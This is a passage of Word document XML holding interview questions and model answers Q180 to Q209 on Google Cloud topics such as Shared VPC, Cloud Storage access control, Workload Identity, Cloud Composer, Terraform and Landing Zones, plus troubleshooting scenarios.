          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Pod sends a packet from its alias-IP address; it's routed through the node's network namespace/veth pair onto the node's primary interface, now carrying the node's IP as it traverses the VPC (since Pod IPs are only routable within the VPC via those alias ranges); the VPC's routing table sends internet-bound traffic (0.0.0.0/0) toward the configured NAT gateway rather than requiring a public IP on the node; Cloud NAT performs source NAT, replacing the node's internal IP with one of its allocated external IPs and tracking the connection in its NAT table; the packet exits to the internet from that external IP, and return traffic is matched back through Cloud NAT's connection tracking to the correct node and, in turn, the correct Pod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q180. Shared VPC definition: What is a Shared VPC in GCP, and why would an organization use one instead of per-project VPCs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shared VPC lets a 'Host Project' own the VPC network(s) and subnets, while other 'Service Projects' attach to and use those networks without owning any networking resources themselves - resources in service projects (VMs, GKE clusters) get provisioned into the shared subnets as if the network were local to them. Organizations use it to centralize network administration, IP address planning, firewall policy, and interconnect/VPN configuration under one team, while still letting individual product teams operate independently within their own projects for billing, IAM, and resource lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q181. Host Project role: What is a Host Project in a Shared VPC setup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Host Project is the project that owns the Shared VPC network and its subnets - it's where firewall rules, routes, Cloud NAT, VPNs/interconnects, and subnet IP ranges are defined and managed centrally. Only the Host Project's IAM policies control who can administer the network itself; other projects don't own any part of the VPC, they're just granted permission to use specific subnets from it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q182. Service Projects role: What are Service Projects in a Shared VPC, and how do they relate to the Host Project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Service Projects are regular GCP projects that have been attached to a Host Project's Shared VPC, which lets their resources (Compute Engine VMs, GKE clusters, etc.) be created directly inside the Host Project's shared subnets using IAM roles like compute.networkUser scoped to specific subnets. This separates concerns cleanly: the product/application team owns and pays for the Service Project and its workloads, while the central networking team retains sole control over the underlying VPC, firewall rules, and IP address space in the Host Project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q183. Subnet sharing across projects: How are subnets shared across projects in a Shared VPC architecture, and how is access to them controlled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An admin in the Host Project enables Shared VPC on specific subnets and grants Service Project teams (or their service accounts) the roles/compute.networkUser IAM role scoped either to the whole Shared VPC or to individual subnets - this determines exactly which subnets each Service Project is allowed to deploy resources into. The Host Project's network admin (roles/compute.xpnAdmin at the organization/folder level) separately controls which projects can even be attached as Service Projects in the first place, giving two layers of control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q184. Bucket design considerations: What should you consider before creating a Cloud Storage bucket for a production workload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Key decisions upfront: location/region (single-region for lowest latency and cost vs multi-region/dual-region for availability and cross-region serving), storage class matched to access pattern (Standard for hot data, Nearline/Coldline/Archive for infrequent access), and access control model (Uniform bucket-level access is the recommended default over fine-grained ACLs). Beyond that: naming (must be globally unique), IAM least-privilege bindings rather than public access, versioning/retention or Object Lifecycle Management rules for cost control and compliance, encryption (Google-managed by default, or CMEK if required), and org policy constraints that block accidental public access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q185. Storage classes: What are the different Cloud Storage storage classes, and how would you choose between them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Standard is for frequently accessed, 'hot' data with no minimum storage duration and the highest per-GB storage cost but no retrieval fee; Nearline is for data accessed roughly less than once a month (30-day minimum storage, small retrieval cost); Coldline is for data accessed roughly less than once a quarter (90-day minimum, higher retrieval cost); and Archive is for long-term backup/compliance data accessed less than once a year (365-day minimum, lowest storage cost, highest retrieval cost and latency). You can also use Autoclass or Object Lifecycle Management rules to automatically transition objects between classes as their access pattern ages, instead of manually picking one class upfront.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q186. Uniform bucket-level access: What is Uniform Bucket-Level Access in Cloud Storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Uniform bucket-level access disables per-object ACLs entirely and makes IAM policies the single source of truth for access control on that bucket - every object inherits the same bucket-level IAM permissions rather than potentially having its own conflicting ACL. This is the recommended default because it's simpler to audit and reason about, and it eliminates the class of bugs where an object is accidentally more permissive than intended due to a legacy or mis-set ACL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q187. Fine-grained access: What is Fine-Grained Access in Cloud Storage, and when would you still need it over uniform access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fine-Grained Access is the legacy model where both bucket-level IAM and per-object ACLs apply, and effective permission is the union of both - it allows setting different access on individual objects within the same bucket (e.g., making one specific object public while the bucket itself is private). You'd still need it for legacy applications or migration scenarios that depend on per-object ACLs already being in place, but for new production workloads, Uniform is almost always the better default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q188. GCS authentication: How do applications authenticate to a Cloud Storage bucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The recommended path is Application Default Credentials backed by a service account identity - for workloads on GCE/GKE that means Workload Identity (GKE) or the attached VM service account (Compute Engine), which the Cloud Storage client libraries pick up automatically with no key file involved; for local development, gcloud auth application-default login provides user credentials. Long-lived downloaded service account JSON keys are also technically supported but are the least secure and most operationally risky option, since they don't expire or rotate automatically and can leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q189. Read-only IAM role: Which IAM role would you assign to a service account that only needs read-only access to objects in a bucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: roles/storage.objectViewer - it grants storage.objects.get and storage.objects.list without any write, delete, or bucket-admin permissions, which is the least-privilege choice for a workload that only needs to read existing objects. Avoid the broader roles/storage.legacyBucketReader or roles/storage.admin unless the workload genuinely needs bucket-metadata visibility or full control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q190. Avoiding service account keys: Why should you avoid using service account keys, and what would you use instead?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Downloaded JSON service account keys are long-lived static secrets - they don't expire automatically, are easy to accidentally commit to source control or leak in logs/artifacts, and once leaked they're valid until someone manually notices and revokes them, giving an attacker a durable credential with no built-in blast-radius limit. Instead, use Workload Identity (GKE) or Workload Identity Federation (for workloads outside GCP) to let workloads impersonate a service account and get short-lived, automatically-rotated tokens with no key material ever created or stored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q191. Workload Identity: What is Workload Identity, and what problem does it solve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity lets a Kubernetes ServiceAccount in GKE impersonate a Google Cloud IAM service account, so Pods can call GCP APIs with that service account's permissions without ever having a downloaded key file mounted into the container - GKE's metadata server transparently issues short-lived tokens via federated identity. It solves the key-management problem: previously, giving a Pod GCP access meant mounting a static service account key as a Secret; Workload Identity replaces that with automatically rotated, least-privilege, per-KSA-scoped credentials, and is now the standard recommended pattern over node-level service accounts or manual key mounting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q192. Cloud Composer experience: Have you worked with Cloud Composer, and in what context?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Answer this as a specific resume-deep-dive: describe the actual pipeline you orchestrated (e.g., 'used Cloud Composer to schedule and orchestrate a daily ETL pipeline that pulled from Cloud Storage/BigQuery, ran transformation jobs, and pushed results downstream'), what DAGs you owned, how you handled failures/retries/alerting, and any operational work you did on the Composer environment itself. If you haven't used it hands-on, be honest and pivot to your Airflow/orchestration fundamentals rather than overclaiming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q193. How Composer works: Explain how Cloud Composer works under the hood.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Composer is Google's managed Apache Airflow service - it provisions and operates the Airflow components (webserver, scheduler, workers, and metadata database) for you on top of a GKE cluster, so you write and manage DAGs (Python files defining task dependencies) without having to run Airflow's infrastructure yourself. DAG files are synced from a Cloud Storage bucket into the Airflow environment, the scheduler parses them and decides what should run, workers execute the actual tasks, and the metadata database (Cloud SQL under the hood) tracks DAG/task state, history, and the UI's view of runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q194. Composer environment components: What components get created in your project when you provision a Cloud Composer environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provisioning a Composer environment creates a dedicated GKE cluster that runs the Airflow scheduler, webserver, and workers; a Cloud SQL instance for the Airflow metadata database; a Cloud Storage bucket that holds your DAGs, plugins, and logs (and is the sync source into the environment); and networking resources depending on how you provisioned it, plus a dedicated service account used by the environment's workloads. Cost and operational overhead come largely from the underlying GKE cluster and Cloud SQL instance, which is why environment sizing is a real cost lever.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q195. Self-hosting Airflow: How would you host Apache Airflow yourself outside of Cloud Composer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run the Airflow components as containers - typically on GKE using the official Helm chart, or on Compute Engine/Cloud Run for smaller setups - with a managed Postgres/Cloud SQL instance as the metadata database, DAGs synced via a Git-sync sidecar or baked into the image/deployment, and the KubernetesExecutor or CeleryExecutor for task execution depending on scale. Compared to Composer, self-hosting gives full control over Airflow version, plugins, and infrastructure sizing but pushes the operational burden (upgrades, scheduler HA, scaling workers, patching) fully onto your team instead of Google.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q196. Composer project role: What was your specific role in a Cloud Composer project you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: This is a resume/behavioral prompt - answer with a concrete ownership statement: what DAGs or pipelines you authored versus maintained, whether you were responsible for the Composer environment's operations (sizing, upgrades, access control) or purely a DAG author, and one specific improvement you made (e.g., reduced DAG failure rate by fixing retry/backoff config, or added SLA/alerting on critical DAGs). Concrete scope and one measurable outcome land better than a vague 'I worked on Composer.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q197. Terraform VM creation: Write Terraform code to create three virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: resource "google_compute_instance" "vm" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  count        = 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name         = "app-vm-${count.index}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  machine_type = "e2-medium"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  zone         = "us-central1-a"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  boot_disk {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    initialize_params {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      image = "debian-cloud/debian-12"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  network_interface {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    network = "default"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    access_config {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Using count = 3 with count.index in the name gives three distinct instances (app-vm-0, app-vm-1, app-vm-2) from one resource block; for anything where instances have meaningfully different attributes, for_each over a map is the better fit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q198. Reusable VM module: How would you design a reusable Terraform module for creating virtual machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I'd expose variables for the things that legitimately vary per caller - instance name/prefix, count or a map of instance configs, machine type, zone/region, image, network/subnetwork, labels, and optional fields like service account and startup script - with sensible defaults so simple callers don't need to specify everything. The module would output the created instance names, self_links, and internal/external IPs so calling code can wire them into other resources, and I'd keep the module's internal resource naming deterministic and free of hardcoded environment-specific values, so the same module can be called for dev/staging/prod just by changing input variables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q199. count vs for_each: Would you use count or for_each for creating multiple similar resources in Terraform, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I'd default to for_each with a map (or a set of strings) whenever the resources are meaningfully distinct or the list might have items removed from the middle, because for_each keys each resource instance by a stable map key rather than a numeric index - so removing item 2 of 5 only destroys that one resource, whereas count re-indexes everything after it and can trigger unnecessary replacement of unrelated instances. I'd only reach for count for truly homogeneous, purely-numeric replication where index-based naming is fine and the list is unlikely to shrink from the middle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q200. Landing Zone overview: Explain what a Landing Zone is and how an organization's Landing Zone is typically structured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Landing Zone is the pre-built, opinionated foundation of an organization's cloud environment - the baseline of accounts/projects, networking, IAM, logging, security controls, and guardrails that every new workload lands into, rather than each team building their own networking and security from scratch. It's typically structured as a resource hierarchy (Organization -&gt; Folders per environment or business unit -&gt; Projects), with a small number of centrally-managed foundational projects (networking/Shared VPC host project, logging/monitoring sink project, security/IAM project) and then many workload projects attached to that foundation as Service Projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q201. Landing Zone components: What components typically exist inside a cloud Landing Zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Typical components: an org-level resource hierarchy (folders for environments/business units), a Shared VPC Host Project with centrally managed subnets, firewall rules, Cloud NAT, and interconnect/VPN; centralized logging and monitoring (org-level log sinks routing to a central destination, and shared monitoring workspaces); centralized IAM/identity federation and organization policies (constraints like disabling external IPs, requiring OS Login, restricting public buckets); a security/guardrails layer (Security Command Center, Binary Authorization, policy-as-code); and often baseline CI/CD scaffolding and Terraform modules that new projects are expected to consume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q202. Centralized networking/logging/monitoring: How are networking, logging, and monitoring centralized across projects in a Landing Zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Networking is centralized through a Shared VPC where the Host Project owns subnets, firewall rules, routes, and NAT/interconnect, and all Service Projects attach to and consume those same subnets rather than each running its own VPC. Logging and monitoring are centralized through organization-level aggregated log sinks that route logs from every project into a central destination (Cloud Storage for archival, BigQuery for analysis, or Pub/Sub for streaming to a SIEM), and a shared Cloud Monitoring workspace or metrics scope that aggregates metrics across projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q203. Project-to-Shared-VPC connection: How are individual projects connected to the Shared VPC in a Landing Zone design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Each new workload project is provisioned as a Service Project and explicitly attached to the Host Project's Shared VPC by a network admin, who grants the project (or specific service accounts within it) the compute.networkUser role scoped to the particular subnets that project is allowed to use. In a mature Landing Zone this attachment is codified in Terraform as part of the standard 'new project' module/pipeline, so every new project automatically gets the correct Shared VPC attachment, firewall tags, and logging sinks applied consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q204. Scenario - GKE Autopilot vs Standard: A team wants to move a workload to GKE Autopilot for cost and ops simplicity. What tradeoffs would you flag before they commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Autopilot removes node management entirely (no node pools, no OS patching, per-Pod billing instead of per-node) which is a real ops win, but it comes with constraints: no DaemonSets in most cases, no privileged containers or host networking, restricted node-level customization, and every Pod must have resource requests set. I'd flag that workloads needing custom node images, GPU/TPU configs outside supported types, privileged security agents, or fine-grained node-pool cost tuning may not fit cleanly, and that per-Pod pricing can actually cost more than a well-bin-packed Standard cluster for very dense workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q205. Scenario - private cluster master access: A private GKE cluster's control plane becomes unreachable from a new office network. How would you diagnose and fix authorized network access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First check the cluster's 'Control plane authorized networks' list - private clusters restrict which CIDR ranges can reach the control plane endpoint, and a new office network's egress IP almost certainly isn't in that allowlist. Fix it by adding the new network's public egress CIDR to the authorized networks list (gcloud container clusters update --enable-master-authorized-networks --master-authorized-networks=&lt;cidr&gt;), and longer-term, route admin access through a Cloud VPN/Interconnect-connected bastion or Identity-Aware Proxy tunnel so you're not maintaining an ever-growing manual IP allowlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q206. Scenario - Cloud NAT port exhaustion: Outbound calls from GKE Pods start failing intermittently and Cloud NAT logs show port exhaustion. How would you diagnose and remediate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Port exhaustion means too many concurrent outbound connections are competing for the finite NAT ports allocated per VM instance - check Cloud NAT's 'Ports Allocated/Ports Used' metrics per instance to confirm which nodes are exhausting their allocation, which usually correlates with a service opening many short-lived outbound connections instead of reusing them. Immediate remediation is increasing the minimum ports-per-VM allocation on the NAT gateway (and/or enabling dynamic port allocation), while the real fix is application-level - add connection pooling/keep-alive or reduce needless per-request connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q207. Scenario - VPC Service Controls block: A data pipeline suddenly gets permission-denied errors reading from BigQuery after a security team change. How would you determine if VPC Service Controls are the cause and fix it safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The signature symptom is a PERMISSION_DENIED that also mentions 'VPC Service Controls' or violates a service perimeter in the error detail - check the VPC-SC violation logs in Cloud Logging (they log denied requests with the offending perimeter and identity even in dry-run mode) to confirm the perimeter, not just IAM, is the blocker. Fix it by adding an explicit ingress/egress rule to the perimeter for the specific service account and BigQuery API calls needed, or by adding the calling project/service account to an access level or bridge - the goal is to narrowly permit the legitimate pipeline traffic while keeping the perimeter intact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q208. Scenario - Terraform workspaces vs directories: How would you decide between Terraform workspaces and separate state directories for managing dev, staging, and prod environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I'd lean toward separate directories/state files per environment (or a tool like Terragrunt layering on top) for anything production-critical, because workspaces share the same backend configuration and variable definitions by default, which makes it easy to accidentally apply against the wrong environment. Native workspaces are fine for genuinely identical, low-risk environments where the convenience of one config outweighs the blast-radius risk, but for dev/staging/prod I want separate state, separate backend paths, and ideally separate service-account credentials per environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q209. Scenario - Composer DAG stuck: An Airflow DAG in Cloud Composer has tasks stuck in a queued state for 30 minutes with no errors. How would you triage it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Queued-with-no-errors almost always points to a scheduling/capacity problem rather than a task-code bug: check worker pool/executor concurrency limits (parallelism, dag_concurrency, pool slots) to see if all available worker slots are already consumed, check the Airflow scheduler's health and logs for whether it's actually heartbeating and assigning tasks, and check the Composer environment's GKE node pool for resource pressure preventing new worker Pods from scheduling. If capacity looks fine, look for a stuck/zombie task holding a pool resource, or a database connection pool exhaustion on the Airflow metadata Cloud SQL instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
